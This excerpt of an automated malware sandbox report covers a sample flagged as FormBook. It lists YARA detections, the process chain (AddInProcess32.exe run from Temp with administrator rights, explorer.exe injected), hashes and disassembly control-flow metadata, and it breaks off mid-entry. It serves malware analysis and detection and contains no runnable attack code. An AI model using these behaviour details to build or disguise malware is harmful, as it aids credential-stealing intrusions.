                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Antivirus matches:
                                                          • Detection: 0%, Metadefender, Browse
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate

                                                          General

                                                          Target ID:34
                                                          Start time:12:04:53
                                                          Start date:07/02/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                          Imagebase:0xbe0000
                                                          File size:42080 bytes
                                                          MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          General

                                                          Target ID:36
                                                          Start time:12:04:59
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff720ea0000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:14%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:33
                                                            Total number of Limit Nodes:2
                                                            execution_graph 20910 b3a2598 20911 b3a2600 CreateWindowExW 20910->20911 20913 b3a26bc 20911->20913 20939 5be8248 20940 5be8293 MoveFileExW 20939->20940 20942 5be82e4 20940->20942 20914 b3a2750 20915 b3a2776 20914->20915 20918 b3a1474 20915->20918 20919 b3a147f 20918->20919 20920 b3a3499 20919->20920 20922 b3a3489 20919->20922 20929 b3a159c 20920->20929 20925 b3a35c0 20922->20925 20923 b3a3497 20927 b3a35d4 20925->20927 20926 b3a3660 20926->20923 20933 b3a3678 20927->20933 20930 b3a15a7 20929->20930 20931 b3a4bda CallWindowProcW 20930->20931 20932 b3a4b89 20930->20932 20931->20932 20932->20923 20934 b3a3689 20933->20934 20936 b3a4b1a 20933->20936 20934->20926 20937 b3a159c CallWindowProcW 20936->20937 20938 b3a4b2a 20937->20938 20938->20934 20943 5be8800 20944 5be898b 20943->20944 20946 5be8826 20943->20946 20946->20944 20948 b3a27e0 SetWindowLongW 20946->20948 20950 5be7798 20946->20950 20949 b3a284c 20948->20949 20949->20946 20951 5be8a80 PostMessageW 20950->20951 20952 5be8aec 20951->20952 20952->20946

                                                            Executed Functions

                                                            Function 05BE4ED0 Relevance: 5.3, Strings: 4, Instructions: 294COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 5be4ed0-5be4f0b 1 5be4f0d 0->1 2 5be4f12-5be4f46 0->2 1->2 3 5be4f47 2->3 4 5be4f4e-5be4f6a 3->4 5 5be4f6c 4->5 6 5be4f73-5be4f74 4->6 5->3 5->6 7 5be527e-5be5295 5->7 8 5be51fc-5be5214 5->8 9 5be503c-5be504f 5->9 10 5be52f9-5be530c 5->10 11 5be4f76-5be4f95 5->11 12 5be5077-5be508a 5->12 13 5be5134-5be514d 5->13 14 5be5230-5be5244 5->14 15 5be50f0-5be5107 5->15 16 5be532e 5->16 17 5be4fac-5be4fb4 5->17 18 5be511a-5be512f 5->18 19 5be5219-5be522b 5->19 20 5be4fd6 5->20 21 5be5296 5->21 22 5be4f97-5be4faa 5->22 23 5be5152-5be5199 5->23 24 5be5051-5be5057 5->24 25 5be530e-5be5329 5->25 26 5be508f-5be5092 5->26 27 5be510c-5be5115 5->27 28 5be5008-5be500c 5->28 29 5be5249-5be524f 5->29 30 5be51c5-5be51c9 5->30 31 5be52c5-5be52c9 5->31 6->17 7->21 32 5be4fdd-5be4ff9 8->32 9->32 38 5be529d-5be52b9 10->38 11->4 12->32 13->32 14->32 15->32 64 5be4fb7 call 5be53e0 17->64 65 5be4fb7 call 5be53d0 17->65 18->32 19->32 20->32 21->38 22->4 61 5be51ac-5be51b3 23->61 62 5be519b-5be51aa 23->62 66 5be505a call 5be56e8 24->66 67 5be505a call 5be56d9 24->67 25->38 68 5be5095 call 5be5430 26->68 69 5be5095 call 5be5421 26->69 27->32 33 5be500e-5be501d 28->33 34 5be501f-5be5026 28->34 70 5be5252 call 5be5480 29->70 71 5be5252 call 5be5470 29->71 35 5be51dc-5be51e3 30->35 36 5be51cb-5be51da 30->36 39 5be52dc-5be52e3 31->39 40 5be52cb-5be52da 31->40 41 5be4ffb 32->41 42 5be5002-5be5003 32->42 43 5be502d-5be503a 33->43 34->43 44 5be51ea-5be51f7 35->44 36->44 48 5be52bb 38->48 49 5be52c2-5be52c3 38->49 50 5be52ea-5be52f7 39->50 40->50 41->7 41->8 41->9 41->10 41->12 41->13 41->14 41->15 41->16 41->18 41->19 41->20 41->21 41->23 41->24 41->25 41->26 41->27 41->28 41->29 41->30 41->31 41->42 42->7 43->32 44->32 45 5be5060-5be5072 45->32 46 5be5258-5be5279 46->32 47 5be509b-5be50b2 55 5be50b9-5be50c4 47->55 48->10 48->16 48->21 48->25 48->31 48->49 49->16 50->38 53 5be4fbd-5be4fd0 53->20 54 5be50b4-5be50b6 53->54 54->55 56 5be50c6-5be50d5 55->56 57 5be50d7-5be50de 55->57 59 5be50e5-5be50e8 56->59 57->59 59->15 63 5be51ba-5be51c0 61->63 62->63 63->32 64->53 65->53 66->45 67->45 68->47 69->47 70->46 71->46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FsKj$VO$['v$['v
                                                            • API String ID: 0-2468429073
                                                            • Opcode ID: b441957381c273b34930d54f4b48645b800b94bf4608dff38843d52e60f675f2
                                                            • Instruction ID: 91364726f8a2b802f5757e2ca34df25de967e7ccdd75671142099c4dae3ca25e
                                                            • Opcode Fuzzy Hash: b441957381c273b34930d54f4b48645b800b94bf4608dff38843d52e60f675f2
                                                            • Instruction Fuzzy Hash: 3AD15570D09208DFDB24CFA5D88469DFFB2FF89314F28946AD01AAB294E734A941CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE56D9 Relevance: 5.3, Strings: 4, Instructions: 265COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 72 5be56d9-5be5713 73 5be571a-5be5744 72->73 74 5be5715 72->74 76 5be5747 73->76 74->73 77 5be574e-5be576a 76->77 78 5be576c 77->78 79 5be5773-5be5774 77->79 78->76 78->79 80 5be589e-5be58d1 78->80 81 5be591c-5be5934 78->81 82 5be5aaa-5be5b0d call 5be5c80 78->82 83 5be5779-5be580d 78->83 84 5be5939-5be5aa5 78->84 85 5be5856-5be5899 78->85 86 5be5812-5be5851 78->86 87 5be58f2-5be58f9 78->87 79->82 107 5be58d8-5be58ed 80->107 108 5be58d3 80->108 81->77 115 5be5b13-5be5b1b 82->115 83->77 84->77 85->77 86->77 88 5be58fb 87->88 89 5be5900-5be5917 87->89 88->89 89->77 107->77 108->107
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c]op$y]e$y]e$y]e
                                                            • API String ID: 0-1554204411
                                                            • Opcode ID: e3c88e32b47fe67628ef6837e24214757b1258c665bb10c01436a2abde397095
                                                            • Instruction ID: cf9377b70dca469c4a119c93c5e3174cbc68cdc626416c9eec232eb672e4bcc9
                                                            • Opcode Fuzzy Hash: e3c88e32b47fe67628ef6837e24214757b1258c665bb10c01436a2abde397095
                                                            • Instruction Fuzzy Hash: D5C11874E01218CFDB54DFA5C954AAEBBB2FF89304F2095A9D409AB354DB30AE42CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE56E8 Relevance: 5.3, Strings: 4, Instructions: 262COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 125 5be56e8-5be5713 126 5be571a-5be5744 125->126 127 5be5715 125->127 129 5be5747 126->129 127->126 130 5be574e-5be576a 129->130 131 5be576c 130->131 132 5be5773-5be5774 130->132 131->129 131->132 133 5be589e-5be58d1 131->133 134 5be591c-5be5934 131->134 135 5be5aaa-5be5b0d call 5be5c80 131->135 136 5be5779-5be580d 131->136 137 5be5939-5be5aa5 131->137 138 5be5856-5be5899 131->138 139 5be5812-5be5851 131->139 140 5be58f2-5be58f9 131->140 132->135 160 5be58d8-5be58ed 133->160 161 5be58d3 133->161 134->130 168 5be5b13-5be5b1b 135->168 136->130 137->130 138->130 139->130 141 5be58fb 140->141 142 5be5900-5be5917 140->142 141->142 142->130 160->130 161->160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c]op$y]e$y]e$y]e
                                                            • API String ID: 0-1554204411
                                                            • Opcode ID: ef5569e9eb2c185bad9c4ab6b996598dfc2e31f1b6c16b7366ae3d6434f455b0
                                                            • Instruction ID: 4954923c935882449b68449a519f42522cf43284f6b9d208097966bd2c7c62c0
                                                            • Opcode Fuzzy Hash: ef5569e9eb2c185bad9c4ab6b996598dfc2e31f1b6c16b7366ae3d6434f455b0
                                                            • Instruction Fuzzy Hash: D1C12774E01218CFDB54DFA5C954AAEBBB2FF89304F2095A9D409AB358DB30AE41CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02196A38 Relevance: 4.7, Strings: 3, Instructions: 912COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D0(i$D0(i$D0(i
                                                            • API String ID: 0-1169208932
                                                            • Opcode ID: b4c2287c4dcfe5d11de2e4af9b58baab57c7381f1c1936197d852d3ace004aed
                                                            • Instruction ID: 3b72bf9204e3bede893b20ea3e2c4f4c6264d2402a25a83d97c298b657ac15bc
                                                            • Opcode Fuzzy Hash: b4c2287c4dcfe5d11de2e4af9b58baab57c7381f1c1936197d852d3ace004aed
                                                            • Instruction Fuzzy Hash: 4972AF70A501088FDF14DFA9D884AAEBBF6BF89304F158469E805DB3A5DB34DD42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219E720 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 455 219e720-219e745 456 219e74c-219e769 455->456 457 219e747 455->457 458 219e771 456->458 457->456 459 219e778-219e794 458->459 460 219e79d-219e79e 459->460 461 219e796 459->461 478 219eb72-219eb79 460->478 461->458 461->460 462 219eb19-219eb30 461->462 463 219e95b-219e972 461->463 464 219e85a-219e87a 461->464 465 219e817-219e824 461->465 466 219ea17-219ea2e 461->466 467 219e7d6-219e7fb 461->467 468 219e90a-219e916 461->468 469 219ea8d-219eaad 461->469 470 219eb4f-219eb6d 461->470 471 219e840-219e855 461->471 472 219e800-219e812 461->472 473 219e8c6-219e8d2 461->473 474 219e87f-219e883 461->474 475 219e8f3-219e905 461->475 476 219ea33-219ea37 461->476 477 219eab2-219eab6 461->477 461->478 479 219e977-219e983 461->479 480 219e829-219e83b 461->480 481 219e9ab-219e9b7 461->481 482 219e8af-219e8c1 461->482 483 219e7a3-219e7bb 461->483 484 219ea63-219ea6f 461->484 485 219e9e2-219e9eb 461->485 486 219eae2-219eaee 461->486 513 219eb38-219eb4a 462->513 463->459 464->459 465->459 466->459 467->459 495 219e918 468->495 496 219e91d-219e933 468->496 469->459 470->459 471->459 472->459 493 219e8d9-219e8ee 473->493 494 219e8d4 473->494 491 219e885-219e894 474->491 492 219e896-219e89d 474->492 475->459 503 219ea39-219ea48 476->503 504 219ea4a-219ea51 476->504 487 219eac9-219ead0 477->487 488 219eab8-219eac7 477->488 497 219e98a-219e9a6 479->497 498 219e985 479->498 480->459 499 219e9b9 481->499 500 219e9be-219e9dd 481->500 482->459 507 219e7bd 483->507 508 219e7c2-219e7d4 483->508 505 219ea71 484->505 506 219ea76-219ea88 484->506 501 219e9ed-219e9fc 485->501 502 219e9fe-219ea05 485->502 489 219eaf0 486->489 490 219eaf5-219eb14 486->490 511 219ead7-219eadd 487->511 488->511 489->490 490->459 514 219e8a4-219e8aa 491->514 492->514 493->459 494->493 495->496 525 219e93a-219e956 496->525 526 219e935 496->526 497->459 498->497 499->500 500->459 516 219ea0c-219ea12 501->516 502->516 517 219ea58-219ea5e 503->517 504->517 505->506 506->459 507->508 508->459 511->459 513->459 514->459 516->459 517->459 525->459 526->525
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *LM$Cn3;
                                                            • API String ID: 0-700852315
                                                            • Opcode ID: e6bffdeaaaa8afe3622f73a6dc1c436743b769af58600a00de0edb994984a224
                                                            • Instruction ID: ac8bab85aa6d2eafb7da844e0539ae5322c3292fb32a48d4c302d56a1534ce27
                                                            • Opcode Fuzzy Hash: e6bffdeaaaa8afe3622f73a6dc1c436743b769af58600a00de0edb994984a224
                                                            • Instruction Fuzzy Hash: 33D16974D4021ADFDB08CFA6C4848AEFBF2FF89300B51952AC515AB324D735AA42CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219BB89 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 925 219bb89-219bbb9 926 219bbbb 925->926 927 219bbc0-219bc19 925->927 926->927 928 219bc23-219bc75 927->928 932 219bc7e-219c676 928->932 933 219bc77 928->933 933->932
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: n\?t$nt|
                                                            • API String ID: 0-1638278369
                                                            • Opcode ID: aa17542f020039ef3ce19d381cc8fd43c4f189079083ce18d26ec8814e75796e
                                                            • Instruction ID: e585699fd84ad10fc8d09118b04103bef5b08c71880bba43bff7bf0aa0792112
                                                            • Opcode Fuzzy Hash: aa17542f020039ef3ce19d381cc8fd43c4f189079083ce18d26ec8814e75796e
                                                            • Instruction Fuzzy Hash: E131FC75E056189FEB18CFABD84069EFBF7AFC8204F14C4BAD408A6254DB340A458F51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE37E8 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EUb<
                                                            • API String ID: 0-2673733354
                                                            • Opcode ID: c508ec288164f700ae6213725dc7308e5d52c1605ad32319844095acd38f3c10
                                                            • Instruction ID: d65932ba68e9b99bf5d8d084021b163896ab3eb1efb4a8ce290d9ddbb90b8483
                                                            • Opcode Fuzzy Hash: c508ec288164f700ae6213725dc7308e5d52c1605ad32319844095acd38f3c10
                                                            • Instruction Fuzzy Hash: 28A15874D05308CFCB14DFA5E5846AEBBF2FF49301F689869C406AB264D739AA81CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE37DA Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EUb<
                                                            • API String ID: 0-2673733354
                                                            • Opcode ID: db8c66cc209d50c2d470bad1abaa3a0db7ad2b8f3943d8e10b5f64210cac0f74
                                                            • Instruction ID: 3361711a655355ab5e1223abcacbc3449f455a9f20e1a5a1bb0c50bc52bce0fd
                                                            • Opcode Fuzzy Hash: db8c66cc209d50c2d470bad1abaa3a0db7ad2b8f3943d8e10b5f64210cac0f74
                                                            • Instruction Fuzzy Hash: 51915674D05308CFCB14DFA5E5846ADBBF2FB49301F68986AC406AB264D739AA81CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021940E8 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `'i
                                                            • API String ID: 0-1972283105
                                                            • Opcode ID: b40cfab39ab457fe887fe714fdeba4c04b393a05b902357b19a2a62f85feae6a
                                                            • Instruction ID: 8604ceac96a7846d0168632cd3999f124c33e0b32c2ec80baa69364be4178493
                                                            • Opcode Fuzzy Hash: b40cfab39ab457fe887fe714fdeba4c04b393a05b902357b19a2a62f85feae6a
                                                            • Instruction Fuzzy Hash: 4381EF74E41208CFDB18DFB9D8846EEBBB2BF89308F649529D418AB255DB349946CF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021948F0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `'i
                                                            • API String ID: 0-1972283105
                                                            • Opcode ID: 00a6a3e2393861ab5171d5964450f358c4ecc229078fbb075f03e245eba842c9
                                                            • Instruction ID: 399ea938394e514497028b994eb6cbaf9571f661dd4f2c1a5c949fe894fa7409
                                                            • Opcode Fuzzy Hash: 00a6a3e2393861ab5171d5964450f358c4ecc229078fbb075f03e245eba842c9
                                                            • Instruction Fuzzy Hash: 005104B5E002189FCB08CFAAD8849DEFBB2BF89314F14C56AE414A7355DB309946CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021977C8 Relevance: .9, Instructions: 913COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e778d874cdf1286165c07847479bb5834f776b8072c76a8726831c020ed4c0ce
                                                            • Instruction ID: 38c82ae624f5aac21129d64f4d2021fdeffe92818c03d1c7a5bd7259ddad9992
                                                            • Opcode Fuzzy Hash: e778d874cdf1286165c07847479bb5834f776b8072c76a8726831c020ed4c0ce
                                                            • Instruction Fuzzy Hash: 56826D74A40509DFCF14CFA8D884AAEBBF6BF49314F168959E406DB2A1CB30ED42CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02194AF9 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b813ecf1783d18f9b259d7a7fe4187025188bac1fd2ee783aa54154d37b3d665
                                                            • Instruction ID: 66bd44be26f82bc848ca100202daf2c3ccbad9ff1fcfb86cb20f31f9b0ad10c2
                                                            • Opcode Fuzzy Hash: b813ecf1783d18f9b259d7a7fe4187025188bac1fd2ee783aa54154d37b3d665
                                                            • Instruction Fuzzy Hash: 79C10274E00218DFDB14DFAAC844BDEBBF6AF88304F1484A9E509AB355CB359A81CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219C703 Relevance: .2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa91e6ce601c0b1c5db2a12f386fd8d2ed5940f82ab261cc63a204b6721de110
                                                            • Instruction ID: 0a89922b3410d5bc2f1c9186636c6e2658d443b8f6d21fcf14500882f96dbcd9
                                                            • Opcode Fuzzy Hash: fa91e6ce601c0b1c5db2a12f386fd8d2ed5940f82ab261cc63a204b6721de110
